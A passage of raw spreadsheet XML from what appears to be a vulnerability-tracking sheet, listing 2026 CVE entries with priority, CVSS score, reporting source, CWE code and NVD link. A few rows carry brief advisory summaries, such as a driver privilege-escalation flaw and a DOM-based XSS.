t="inlineStr"><is><t>2026-08-24</t></is></c><c r="P1284" s="5" t="inlineStr" /><c r="Q1284" s="5" t="inlineStr"><is><t>CWE-639</t></is></c><c r="R1284" s="5" t="inlineStr"><is><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is></c><c r="S1284" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-71505</t></is></c></row><row r="1285"><c r="A1285" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1285" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1285" s="5" t="inlineStr"><is><t>CVE-2026-71507</t></is></c><c r="D1285" s="5" t="n"><v>7.1</v></c><c r="E1285" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1285" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G1285" s="5" t="inlineStr" /><c r="H1285" s="5" t="n"><v>0.002</v></c><c r="I1285" s="5" t="inlineStr" /><c r="J1285" s="5" t="inlineStr" /><c r="K1285" s="5" t="inlineStr" /><c r="L1285" s="5" t="inlineStr" /><c r="M1285" s="5" t="inlineStr" /><c r="N1285" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1285" s="5" t="inlineStr"><is><t>2026-08-24</t></is></c><c r="P1285" s="5" t="inlineStr" /><c r="Q1285" s="5" t="inlineStr"><is><t>CWE-639</t></is></c><c r="R1285" s="5" t="inlineStr"><is><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is></c><c r="S1285" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-71507</t></is></c></row><row r="1286"><c r="A1286" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1286" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1286" s="5" t="inlineStr"><is><t>CVE-2026-71508</t></is></c><c r="D1286" s="5" t="n"><v>7.1</v></c><c r="E1286" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1286" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G1286" s="5" t="inlineStr" /><c r="H1286" s="5" t="n"><v>0.002</v></c><c r="I1286" s="5" t="inlineStr" /><c r="J1286" s="5" t="inlineStr" /><c r="K1286" s="5" t="inlineStr" /><c r="L1286" s="5" t="inlineStr" /><c r="M1286" s="5" t="inlineStr" /><c r="N1286" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1286" s="5" t="inlineStr"><is><t>2026-08-24</t></is></c><c r="P1286" s="5" t="inlineStr" /><c r="Q1286" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="R1286" s="5" t="inlineStr"><is><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is></c><c r="S1286" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-71508</t></is></c></row><row r="1287"><c r="A1287" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1287" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1287" s="5" t="inlineStr"><is><t>CVE-2026-71509</t></is></c><c r="D1287" s="5" t="n"><v>7.1</v></c><c r="E1287" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1287" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G1287" s="5" t="inlineStr" /><c r="H1287" s="5" t="n"><v>0.002</v></c><c r="I1287" s="5" t="inlineStr" /><c r="J1287" s="5" t="inlineStr" /><c r="K1287" s="5" t="inlineStr" /><c r="L1287" s="5" t="inlineStr" /><c r="M1287" s="5" t="inlineStr" /><c r="N1287" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1287" s="5" t="inlineStr"><is><t>2026-08-24</t></is></c><c r="P1287" s="5" t="inlineStr" /><c r="Q1287" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="R1287" s="5" t="inlineStr"><is><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is></c><c r="S1287" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-71509</t></is></c></row><row r="1288"><c r="A1288" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1288" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1288" s="5" t="inlineStr"><is><t>CVE-2026-71511</t></is></c><c r="D1288" s="5" t="n"><v>7.1</v></c><c r="E1288" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1288" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G1288" s="5" t="inlineStr" /><c r="H1288" s="5" t="n"><v>0.002</v></c><c r="I1288" s="5" t="inlineStr" /><c r="J1288" s="5" t="inlineStr" /><c r="K1288" s="5" t="inlineStr" /><c r="L1288" s="5" t="inlineStr" /><c r="M1288" s="5" t="inlineStr" /><c r="N1288" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1288" s="5" t="inlineStr"><is><t>2026-08-24</t></is></c><c r="P1288" s="5" t="inlineStr" /><c r="Q1288" s="5" t="inlineStr"><is><t>CWE-522</t></is></c><c r="R1288" s="5" t="inlineStr"><is><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is></c><c r="S1288" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-71511</t></is></c></row><row r="1289"><c r="A1289" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1289" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1289" s="5" t="inlineStr"><is><t>CVE-2026-73321</t></is></c><c r="D1289" s="5" t="n"><v>7.1</v></c><c r="E1289" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1289" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G1289" s="5" t="inlineStr" /><c r="H1289" s="5" t="n"><v>0.004</v></c><c r="I1289" s="5" t="inlineStr" /><c r="J1289" s="5" t="inlineStr" /><c r="K1289" s="5" t="inlineStr"><is><t>xenforo:xenforo</t></is></c><c r="L1289" s="5" t="inlineStr" /><c r="M1289" s="5" t="inlineStr" /><c r="N1289" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1289" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1289" s="5" t="inlineStr" /><c r="Q1289" s="5" t="inlineStr"><is><t>CWE-674</t></is></c><c r="R1289" s="5" t="inlineStr"><is><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is></c><c r="S1289" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73321</t></is></c></row><row r="1290"><c r="A1290" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1290" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1290" s="5" t="inlineStr"><is><t>CVE-2026-76223</t></is></c><c r="D1290" s="5" t="n"><v>7.1</v></c><c r="E1290" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1290" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G1290" s="5" t="inlineStr" /><c r="H1290" s="5" t="n"><v>0.002</v></c><c r="I1290" s="5" t="inlineStr" /><c r="J1290" s="5" t="inlineStr" /><c r="K1290" s="5" t="inlineStr" /><c r="L1290" s="5" t="inlineStr" /><c r="M1290" s="5" t="inlineStr" /><c r="N1290" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1290" s="5" t="inlineStr"><is><t>2026-08-19</t></is></c><c r="P1290" s="5" t="inlineStr" /><c r="Q1290" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="R1290" s="5" t="inlineStr"><is><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is></c><c r="S1290" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-76223</t></is></c></row><row r="1291"><c r="A1291" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1291" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1291" s="5" t="inlineStr"><is><t>CVE-2026-77125</t></is></c><c r="D1291" s="5" t="n"><v>7.1</v></c><c r="E1291" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1291" s="5" t="inlineStr"><is><t>103e4ec9-0a87-450b-af77-479448ddef11</t></is></c><c r="G1291" s="5" t="inlineStr" /><c r="H1291" s="5" t="n"><v>0.002</v></c><c r="I1291" s="5" t="inlineStr" /><c r="J1291" s="5" t="inlineStr" /><c r="K1291" s="5" t="inlineStr" /><c r="L1291" s="5" t="inlineStr" /><c r="M1291" s="5" t="inlineStr" /><c r="N1291" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1291" s="5" t="inlineStr"><is><t>2026-09-02</t></is></c><c r="P1291" s="5" t="inlineStr" /><c r="Q1291" s="5" t="inlineStr"><is><t>CWE-863</t></is></c><c r="R1291" s="5" t="inlineStr"><is><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is></c><c r="S1291" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77125</t></is></c></row><row r="1292"><c r="A1292" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1292" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1292" s="5" t="inlineStr"><is><t>CVE-2026-77939</t></is></c><c r="D1292" s="5" t="n"><v>7.1</v></c><c r="E1292" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1292" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G1292" s="5" t="inlineStr" /><c r="H1292" s="5" t="n"><v>0.004</v></c><c r="I1292" s="5" t="inlineStr" /><c r="J1292" s="5" t="inlineStr" /><c r="K1292" s="5" t="inlineStr" /><c r="L1292" s="5" t="inlineStr" /><c r="M1292" s="5" t="inlineStr" /><c r="N1292" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1292" s="5" t="inlineStr"><is><t>2026-08-28</t></is></c><c r="P1292" s="5" t="inlineStr" /><c r="Q1292" s="5" t="inlineStr"><is><t>CWE-1336, CWE-94</t></is></c><c r="R1292" s="5" t="inlineStr"><is><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is></c><c r="S1292" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77939</t></is></c></row><row r="1293"><c r="A1293" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1293" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1293" s="5" t="inlineStr"><is><t>CVE-2026-79745</t></is></c><c r="D1293" s="5" t="n"><v>7.1</v></c><c r="E1293" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1293" s="5" t="inlineStr"><is><t>security-advisories@github.com</t></is></c><c r="G1293" s="5" t="inlineStr" /><c r="H1293" s="5" t="n"><v>0.002</v></c><c r="I1293" s="5" t="inlineStr" /><c r="J1293" s="5" t="inlineStr" /><c r="K1293" s="5" t="inlineStr" /><c r="L1293" s="5" t="inlineStr" /><c r="M1293" s="5" t="inlineStr" /><c r="N1293" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1293" s="5" t="inlineStr"><is><t>2026-08-31</t></is></c><c r="P1293" s="5" t="inlineStr" /><c r="Q1293" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="R1293" s="5" t="inlineStr"><is><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is></c><c r="S1293" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-79745</t></is></c></row><row r="1294"><c r="A1294" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1294" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1294" s="5" t="inlineStr"><is><t>CVE-2026-79747</t></is></c><c r="D1294" s="5" t="n"><v>7.1</v></c><c r="E1294" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1294" s="5" t="inlineStr"><is><t>security-advisories@github.com</t></is></c><c r="G1294" s="5" t="inlineStr" /><c r="H1294" s="5" t="n"><v>0.002</v></c><c r="I1294" s="5" t="inlineStr" /><c r="J1294" s="5" t="inlineStr" /><c r="K1294" s="5" t="inlineStr" /><c r="L1294" s="5" t="inlineStr" /><c r="M1294" s="5" t="inlineStr" /><c r="N1294" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1294" s="5" t="inlineStr"><is><t>2026-08-31</t></is></c><c r="P1294" s="5" t="inlineStr" /><c r="Q1294" s="5" t="inlineStr"><is><t>CWE-918</t></is></c><c r="R1294" s="5" t="inlineStr"><is><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is></c><c r="S1294" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-79747</t></is></c></row><row r="1295"><c r="A1295" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1295" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1295" s="5" t="inlineStr"><is><t>CVE-2026-80117</t></is></c><c r="D1295" s="5" t="n"><v>7.1</v></c><c r="E1295" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1295" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G1295" s="5" t="inlineStr" /><c r="H1295" s="5" t="n"><v>0.001</v></c><c r="I1295" s="5" t="inlineStr" /><c r="J1295" s="5" t="inlineStr" /><c r="K1295" s="5" t="inlineStr" /><c r="L1295" s="5" t="inlineStr" /><c r="M1295" s="5" t="inlineStr" /><c r="N1295" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1295" s="5" t="inlineStr"><is><t>2026-09-04</t></is></c><c r="P1295" s="5" t="inlineStr" /><c r="Q1295" s="5" t="inlineStr"><is><t>CWE-782</t></is></c><c r="R1295" s="5" t="inlineStr"><is><t>PassMark PerformanceTest before 11.1 build 1012, BurnInTest before 11.1 build 1000, and OSForensics before 11.1 build 1016 contain a privilege escalation vulnerability in DirectIo64.sys that allows local users to issue arbitrary IN and OUT instructions to any x86 I/O port due to missing allowlist or port validation on exposed IOCTLs. Attackers can obtain a device handle and write to sensitive ports including the PS/2 controller port, CPU reset ports, CMOS configuration ports, and interrupt controller ports to cause an immediate system reset or other hardware-level manipulation from a standard user account.</t></is></c><c r="S1295" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-80117</t></is></c></row><row r="1296"><c r="A1296" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1296" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1296" s="5" t="inlineStr"><is><t>CVE-2026-81404</t></is></c><c r="D1296" s="5" t="n"><v>7.1</v></c><c r="E1296" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1296" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1296" s="5" t="inlineStr" /><c r="H1296" s="5" t="n"><v>0.002</v></c><c r="I1296" s="5" t="inlineStr" /><c r="J1296" s="5" t="inlineStr" /><c r="K1296" s="5" t="inlineStr" /><c r="L1296" s="5" t="inlineStr" /><c r="M1296" s="5" t="inlineStr" /><c r="N1296" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1296" s="5" t="inlineStr"><is><t>2026-09-05</t></is></c><c r="P1296" s="5" t="inlineStr" /><c r="Q1296" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R1296" s="5" t="inlineStr"><is><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is></c><c r="S1296" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81404</t></is></c></row><row r="1297"><c r="A1297" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1297" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1297" s="5" t="inlineStr"><is><t>CVE-2026-81781</t></is></c><c r="D1297" s="5" t="n"><v>7.1</v></c><c r="E1297" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1297" s="5" t="inlineStr"><is><t>audit@patchstack.com</t></is></c><c r="G1297" s="5" t="inlineStr" /><c r="H1297" s="5" t="n"><v>0.002</v></c><c r="I1297" s="5" t="inlineStr" /><c r="J1297" s="5" t="inlineStr" /><c r="K1297" s="5" t="inlineStr" /><c r="L1297" s="5" t="inlineStr" /><c r="M1297" s="5" t="inlineStr" /><c r="N1297" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1297" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1297" s="5" t="inlineStr" /><c r="Q1297" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="R1297" s="5" t="inlineStr"><is><t>Missing Authorization vulnerability in Unbounce Unbounce Landing Pages unbounce allows Exploiting Incorrectly Configured Access Control Security Levels.

This issue affects Unbounce Landing Pages: from n/a through 1.1.4.</t></is></c><c r="S1297" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81781</t></is></c></row><row r="1298"><c r="A1298" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1298" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1298" s="5" t="inlineStr"><is><t>CVE-2026-81798</t></is></c><c r="D1298" s="5" t="n"><v>7.1</v></c><c r="E1298" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1298" s="5" t="inlineStr"><is><t>audit@patchstack.com</t></is></c><c r="G1298" s="5" t="inlineStr" /><c r="H1298" s="5" t="n"><v>0.001</v></c><c r="I1298" s="5" t="inlineStr" /><c r="J1298" s="5" t="inlineStr" /><c r="K1298" s="5" t="inlineStr" /><c r="L1298" s="5" t="inlineStr" /><c r="M1298" s="5" t="inlineStr" /><c r="N1298" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1298" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1298" s="5" t="inlineStr" /><c r="Q1298" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R1298" s="5" t="inlineStr"><is><t>Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Easy Appointments allows DOM-Based XSS.

This issue affects Easy Appointments: from n/a through 4.0.2.1.</t></is></c><c r="S1298" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81798</t></is></c></row><row r="1299"><c r="A1299" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1299" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1299" s="5" t="inlineStr"><is><t>CVE-2026-82052</t></is></c><c r="D1299" s="5" t="n"><v>7.1</v></c><c r="E1299" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1299" s="5" t="inlineStr"><is><t>cna@mongodb.com</t></is></c><c r="G1299" s="5" t="inlineStr" /><c r="H1299" s="5" t="n"><v>0.004</v></c><c r="I1299" s="5" t="inlineStr" /><c r="J1299" s="5" t="inlineStr"><is><t>mongodb</t></is></c><c r="K1299" s="5" t="inlineStr"><is><t>mongodb:mongodb</t></is></c><c r="L1299" s="5" t="inlineStr" /><c r="M1299" s="5" t="inlineStr" /><c r="N1299" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1299" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1299" s="5" t="inlineStr" /><c r="Q1299" s="5" t="inlineStr"><is><t>CWE-617</t></is></c><c r="R1299" s="5" t="inlineStr"><is><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is></c><c r="S1299" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-82052</t></is></c></row><row r="1300"><c r="A1300" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1300" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1300" s="5" t="inlineStr"><is><t>CVE-2026-82054</t></is></c><c r="D1300" s="5" t="n"><v>7.1</v></c><c r="E1300" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1300" s="5" t="inlineStr"><is><t>cna@mongodb.com</t></is></c><c r="G1300" s="5" t="inlineStr" /><c r="H1300" s="5" t="n"><v>0.003</v></c><c r="I1300" s="5" t="inlineStr" /><c r="J1300" s="5" t="inlineStr"><is><t>mongodb</t></is></c><c r="K1300" s="5" t="inlineStr"><is><t>mongodb:mongodb</t></is></c><c r="L1300" s="5" t="inlineStr" /><c r="M1300" s="5" t="inlineStr" /><c r="N1300" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1300" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1300" s="5" t="inlineStr" /><c r="Q1300" s="5" t="inlineStr"><is><t>CWE-770</t></is></c><c r="R1300" s="5" t="inlineStr"><is><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is></c><c r="S1300" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-82054</t></is></c></row><row r="1301"><c r="A1301" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1301" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1301" s="5" t="inlineStr"><is><t>CVE-2026-82055</t></is></c><c r="D1301" s="5" t="n"><v>7.1</v></c><c r="E1301" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1301" s="5" t="inlineStr"><is><t>cna@mongodb.com</t></is></c><c r="G1301" s="5" t="inlineStr" /><c r="H1301" s="5" t="n"><v>0.003</v></c><c r="I1301" s="5" t="inlineStr" /><c r="J1301" s="5" t="inlineStr"><is><t>mongodb</t></is></c><c r="K1301" s="5" t="inlineStr"><is><t>mongodb:mongodb</t></is></c><c r="L1301" s="5" t="inlineStr" /><c r="M1301" s="5" t="inlineStr" /><c r="N1301" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1301" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1301" s="5" t="inlineStr" /><c r="Q1301" s="5" t="inlineStr"><is><t>CWE-476</t></is></c><c r="R1301" s="5" t="inlineStr"><is><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is></c><c r="S1301" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-82055</t></is></c></row><row r="1302"><c r="A1302" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1302" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1302" s="5" t="inlineStr"><is><t>CVE-2026-82057</t></is></c><c r="D1302" s="5" t="n"><v>7.1</v></c><c r="E1302" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1302" s="5" t="inlineStr"><is><t>cna@mongodb.com</t></is></c><c r="G1302" s="5" t="inlineStr" /><c r="H1302" s="5" t="n"><v>0.003</v></c><c r="I1302" s="5" t="inlineStr" /><c r="J1302" s="5" t="inlineStr"><is><t>mongodb</t></is></c><c r="K1302" s="5" t="inlineStr"><is><t>mongodb:mongodb</t></is></c><c r="L1302" s="5" t="inlineStr" /><c r="M1302" s="5" t="inlineStr" /><c r="N1302" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1302" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1302" s="5" t="inlineStr" /><c r="Q1302" s="5" t="inlineStr"><is><t>CWE-843</t></is></c><c r="R1302" s="5" t="inlineStr"><is><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is></c><c r="S1302" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-82057</t></is></c></row><row r="1303"><c r="A1303" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1303" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1303" s="5" t="inlineStr"><is><t>CVE-2026-82058</t></is></c><c r="D1303" s="5" t="n"><v>7.1</v></c><c r="E1303" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1303" s="5" t="inlineStr"><is><t>cna@mongodb.com</t></is></c><c r="G1303" s="5" t="inlineStr" /><c r="H1303" s="5" t="n"><v>0.003</v></c><c r="I1303" s="5" t="inlineStr" /><c r="J1303" s="5" t="inlineStr"><is><t>mongodb</t></is></c><c r="K1303" s="5" t="inlineStr"><is><t>mongodb:mongodb</t></is></c><c r="L1303" s="5" t="inlineStr" /><c r="M1303" s="5" t="inlineStr" /><c r="N1303" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1303" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1303" s="5" t="inlineStr" /><c r="Q1303" s="5" t="inlineStr"><is><t>CWE-248</t></is></c><c r="R1303" s="5" t="inlineStr"><is><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is></c><c r="S1303" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-82058</t></is></c></row><row r="1304"><c r="A1304" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1304" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1304" s="5" t="inlineStr"><is><t>CVE-2026-82065</t></is></c><c r="D1304" s="5" t="n"><v>7.1</v></c><c r="E1304" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1304" s="5" t="inlineStr"><is><t>cna@mongodb.com</t></is></c><c r="G1304" s="5" t="inlineStr" /><c r="H1304" s="5" t="n"><v>0.003</v></c><c r="I1304" s="5" t="inlineStr" /><c r="J1304" s="5" t="inlineStr"><is><t>mongodb</t></is></c><c r="K1304" s="5" t="inlineStr"><is><t>mongodb:mongodb</t></is></c><c r="L1304" s="5" t="inlineStr" /><c r="M1304" s="5" t="inlineStr" /><c r="N1304" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1304" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1304" s="5" t="inlineStr" /><c r="Q1304" s="5" t="inlineStr"><is><t>CWE-617</t></is></c><c r="R1304" s="5" t="inlineStr"><is><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is></c><c r="S1304" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-82065</t></is></c></row><row r="1305"><c r="A1305" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1305" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1305" s="5" t="inlineStr"><is><t>CVE-2026-82068</t></is></c><c r="D1305" s="5" t="n"><v>7.1</v></c><c r="E1305" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1305" s="5" t="inlineStr"><is><t>cna@mongodb.com</t></is></c><c r="G1305" s="5" t="inlineStr" /><c r="H1305" s="5" t="n"><v>0.003</v></c><c r="I1305" s="5" t="inlineStr" /><c r="J1305" s="5" t="inlineStr"><is><t>mongodb</t></is></c><c r="K1305" s="5" t="inlineStr"><is><t>mongodb:mongodb</t></is></c><c r="L1305" s="5" t="inlineStr" /><c r="M1305" s="5" t="inlineStr" /><c r="N1305" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1305" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1305" s="5" t="inlineStr" /><c r="Q1305" s="5" t="inlineStr"><is><t>CWE-617</t></is></c><c r="R1305" s="5" t="inlineStr"><is><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is></c><c r="S1305" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-82068</t></is></c></row><row r="1306"><c r="A1306" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1306" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1306" s="5" t="inlineStr"><is><t>CVE-2026-82070</t></is></c><c r="D1306" s="5" t="n"><v>7.1</v></c><c r="E1306" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1306" s="5" t="inlineStr"><is><t>cna@mongodb.com</t></is></c><c r="G1306" s="5" t="inlineStr" /><c r="H1306" s="5" t="n"><v>0.002</v></c><c r="I1306" s="5" t="inlineStr" /><c r="J1306" s="5" t="inlineStr"><is><t>mongodb</t></is></c><c r="K1306" s="5" t="inlineStr"><is><t>mongodb:mongodb</t></is></c><c r="L1306" s="5" t="inlineStr" /><c r="M1306" s="5" t="inlineStr" /><c r="N1306" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1306" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1306" s="5" t="inlineStr" /><c r="Q1306" s="5" t="inlineStr"><is><t>CWE-522</t></is></c><c r="R1306" s="5" t="inlineStr"><is><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is></c><c r="S1306" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-82070</t></is></c></row><row r="1307"><c r="A1307" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1307" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1307" s="5" t="inlineStr"><is><t>CVE-2026-82073</t></is></c><c r="D1307" s="5" t="n"><v>7.1</v></c><c r="E1307" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1307" s="5" t="inlineStr"><is><t>cna@mongodb.com</t></is></c><c r="G1307" s="5" t="inlineStr" /><c r="H1307" s="5" t="n"><v>0.003</v></c><c r="I1307" s="5" t="inlineStr" /><c r="J1307" s="5" t="inlineStr"><is><t>mongodb</t></is></c><c r="K1307" s="5" t="inlineStr"><is><t>mongodb:mongodb</t></is></c><c r="L1307" s="5" t="inlineStr" /><c r="M1307" s="5" t="inlineStr" /><c r="N1307" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1307" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1307" s="5" t="inlineStr" /><c r="Q1307" s="5" t="inlineStr"><is><t>CWE-863</t></is></c><c r="R1307" s="5" t="inlineStr"><is><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is></c><c r="S1307" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-82073</t></is></c></row><row r="1308"><c r="A1308" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1308" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1308" s="5" t="inlineStr"><is><t>CVE-2026-82074</t></is></c><c r="D1308" s="5" t="n"><v>7.1</v></c><c r="E1308" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1308" s="5" t="inlineStr"><is><t>cna@mongodb.com</t></is></c><c r="G1308" s="5" t="inlineStr" /><c r="H1308" s="5" t="n"><v>0.002</v></c><c r="I1308" s="5" t="inlineStr" /><c r="J1308" s="5" t="inlineStr"><is><t>mongodb</t></is></c><c r="K1308" s="5" t="inlineStr"><is><t>mongodb:mongodb</t></is></c><c r="L1308" s="5" t="inlineStr" /><c r="M1308" s="5" t="inlineStr" /><c r="N1308" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1308" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1308" s="5" t="inlineStr" /><c r="Q1308" s="5" 